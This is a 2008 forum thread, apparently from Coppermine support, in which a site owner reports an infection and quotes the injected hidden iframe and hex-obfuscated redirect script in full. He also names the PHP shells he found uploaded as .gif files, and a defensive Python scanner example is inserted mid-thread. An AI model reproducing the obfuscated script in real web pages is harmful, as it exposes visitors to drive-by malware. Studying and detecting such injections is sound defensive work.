
Topic: HACKER ATTACK . . . . be careful


aftab1003

HACKER ATTACK . . . . be careful
« on: October 28, 2008, 06:46:22 pm »

Hi fellows,

I just received a hacker attack on my site http://www.picturerating.us

Symptoms of the attack...

If you are using a strong and updated antivirus like mine, KAV 7, then you will be notified that your site is trying to download a trojan horse...

Actually there is no virus in your site or server; it's an iframe code in the main files, like index, main, home, login, admin etc.
The iframe code is...
Quote
<script>check_content()</script><script>check_content()</script><iframe src='http://url/' width='1' height='1' style='visibility: hidden;'></iframe><script>function c41687154048m49073afa06296(m49073afa0693c){  return (parseInt(m49073afa0693c,16));}function m49073afa07c30(m49073afa0819d){ function m49073afa0903f(){return 2;} var m49073afa08878='';m49073afa09c06=String.fromCharCode;for(m49073afa08c5e=0;m49073afa08c5e<m49073afa0819d.length;m49073afa08c5e+=m49073afa0903f()){ m49073afa08878+=(m49073afa09c06(c41687154048m49073afa06296(m49073afa0819d.substr(m49073afa08c5e,m49073afa0903f()))));}return m49073afa08878;} var zaf='';var m49073afa0a4bb='3C7'+zaf+'3637'+zaf+'2697'+zaf+'07'+zaf+'43E696628216D7'+zaf+'96961297'+zaf+'B646F637'+zaf+'56D656E7'+zaf+'42E7'+zaf+'7'+zaf+'7'+zaf+'2697'+zaf+'465287'+zaf+'56E657'+zaf+'363617'+zaf+'065282027'+zaf+'2533632536392536362537'+zaf+'322536312536642536352532302536652536312536642536352533642536332533342532302537'+zaf+'332537'+zaf+'32253633253364253237'+zaf+'2536382537'+zaf+'342537'+zaf+'342537'+zaf+'302533612532662532662536322537'+zaf+'35253637'+zaf+'2537'+zaf+'61253639253663253663253631253265253638253639253637'+zaf+'2536382536632536352537'+zaf+'362536352536632532652536322536392537'+zaf+'612532662536362536662537'+zaf+'322537'+zaf+'352536642532662534632536312537'+zaf+'33253665253631253366253237'+zaf+'2532622534642536312537'+zaf+'342536382532652537'+zaf+'322536662537'+zaf+'352536652536342532382534642536312537'+zaf+'342536382532652537'+zaf+'32253631253665253634253666253664253238253239253261253332253331253332253331253337'+zaf+'253330253239253262253237'+zaf+'253330253337'+zaf+'253338253634253333253635253633253335253635253237'+zaf+'2532302537'+zaf+'37'+zaf+'2536392536342537'+zaf+'34253638253364253334253333253333253230253638253635253639253637'+zaf+'2536382537'+zaf+'342533642533342533392533302532302537'+zaf+'332537'+zaf+'342537'+zaf+'39253663253635253364253237'+zaf+'2536342536392537'+zaf+'332537'+zaf+'302536632536312537'+zaf+'39253361253230253
665253666253665253635253237'+zaf+'2533652533632532662536392536362537'+zaf+'3225363125366425363525336527'+zaf+'29293B7'+zaf+'D7'+zaf+'6617'+zaf+'2206D7'+zaf+'969613D7'+zaf+'47'+zaf+'27'+zaf+'5653B3C2F7'+zaf+'3637'+zaf+'2697'+zaf+'07'+zaf+'43E';document.write(m49073afa07c30(m49073afa0a4bb));</script><script>check_content()</script>

and it redirects the visitors to the site...

bugzilla.highlevel.biz/forum/las

I am using 3 scripts on my site:

picturerating.us/picturerating/index.php picture rating
picturerating.us/picture-gallery/index.php coppermine latest update
blog.picturerating.us wordpress latest updated blog

Actually I don't know exactly where the hacker came in, but there is only one way where a user can upload some pictures in Coppermine...

It affected all of my websites hosted on my server (hostmonster), but only main index or important files...

SOLUTION

I am trying to remove the iframe code from each of my files by downloading every file and then re-uploading it after removing the iframe code...

If anyone finds or is facing this type of issue, then tell here if you know from where the hacker injected the code into our pages, so the ADMIN team can close this security hole to protect the thousands of sites running their script...


I hope this will help other members like me...

Have a nice day and take care.
Logged

aftab1003

Re: HACKER ATTACK . . . . be careful
« Reply #1 on: October 28, 2008, 07:56:23 pm »

The infected files were found...

The infected files were stored in my gallery...

picturerating.us/picture-gallery/albums/userpics/sss_php.gif: PHP.Shell
picturerating.us/picture-gallery/albums/userpics/c99shell_php.gif: Trojan.PHP.C99Shell

But one thing is that I am not allowing anyone to get registered, and then how did these files get in?


Solution

Remove these files, and block this .GIF extension for further uploads...
and then remove all iframes manually or ask your host to do this...

GOOD LUCK
Logged
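
The two symptoms reported in the posts above (a hidden 1x1 iframe written into page files, and PHP shells stored under a `.gif` name in `albums/userpics`) can both be checked for with a scan like the following. This is an added example, not code from any poster or from the Coppermine project; the extensions scanned, the patterns, and the sample tree built in `demo()` are assumptions constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

# Leading bytes of the image types a gallery normally accepts.
IMAGE_MAGIC = {".gif": (b"GIF87a", b"GIF89a"), ".jpg": (b"\xff\xd8\xff",),
               ".jpeg": (b"\xff\xd8\xff",), ".png": (b"\x89PNG\r\n\x1a\n",)}
PAGE_EXT = {".php", ".html", ".htm", ".tpl"}
PHP_TAG = re.compile(rb"<\?php", re.I)
# 1x1 or style-hidden iframe, the shape of the injection quoted in the thread.
HIDDEN_IFRAME = re.compile(
    rb"<iframe\b[^>]*(width=['\"]?1\b[^>]*height=['\"]?1\b"
    rb"|visibility:\s*hidden|display:\s*none)", re.I)


def scan_tree(root):
    """Return sorted (relative_path, reason) findings for files under root."""
    findings = []
    for path in (p for p in Path(root).rglob("*") if p.is_file()):
        ext, data = path.suffix.lower(), path.read_bytes()
        rel = path.relative_to(root).as_posix()
        if ext in IMAGE_MAGIC:
            if not data.startswith(IMAGE_MAGIC[ext]):
                findings.append((rel, "bad image header"))
            if PHP_TAG.search(data):  # a valid header does not rule this out
                findings.append((rel, "PHP tag in image file"))
        elif ext in PAGE_EXT and HIDDEN_IFRAME.search(data):
            findings.append((rel, "hidden iframe"))
    return sorted(findings)


def demo():
    samples = {  # constructed sample tree; all names and contents are made up
        "index.php": b"<p>hi</p><iframe src='http://url/' width='1' height='1'></iframe>",
        "video.html": b"<iframe src='http://url/' width='560' height='315'></iframe>",
        "albums/userpics/a_php.gif": b"GIF89a<?php /* constructed */ ?>",
        "albums/userpics/b_php.gif": b"<?php /* constructed */ ?>",
        "albums/userpics/ok.gif": b"GIF89a\x01\x00\x01\x00\x80\x00\x00",
    }
    with tempfile.TemporaryDirectory() as root:
        for rel, body in samples.items():
            target = Path(root, rel)
            target.parent.mkdir(parents=True, exist_ok=True)
            target.write_bytes(body)
        return scan_tree(root)


if __name__ == "__main__":
    print(*demo(), sep="\n")
```

Run `scan_tree()` against a downloaded copy of the web root. A file reported only as "PHP tag in image file" has a valid image header, which is the case a header-only upload check lets through.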

Nibbler

  • Guest
Re: HACKER ATTACK . . . . be careful
« Reply #2 on: October 28, 2008, 08:28:12 pm »

You are running version 1.4.17 - certainly not the latest.
Logged

Joachim Müller

  • Dev Team member
Re: HACKER ATTACK . . . . be careful
« Reply #3 on: October 28, 2008, 11:24:54 pm »

I have little sympathy for people who are reluctant to upgrade and then blame the app if an attacker was able to exploit known vulnerabilities of the old, outdated version you run.
Logged

mattduke19

Re: HACKER ATTACK . . . . be careful
« Reply #4 on: October 29, 2008, 04:40:49 pm »

I'm not using Coppermine, just a basic Wordpress blog, but I also lost controls to all .php files recently. After using Firebug I found this at the bottom of my page -

<iframe src='http://url/' width='1' height='1' style='visibility: hidden;'></iframe><script>function c41687154048m49..(ridiculously long string)....</script>

I'm removing the entire blog for now to see what happens.
Good luck




Logged

Joachim Müller

  • Dev Team member
Re: HACKER ATTACK . . . . be careful
« Reply #5 on: October 29, 2008, 11:46:46 pm »

Thanks for your report. If you don't even use coppermine, chances are high that you haven't been infected by a vulnerability in coppermine.
Many hacks (the payload) involve silly <iframe>/<script> code injections, so the fact that an iframe shows doesn't mean anything special.
Logged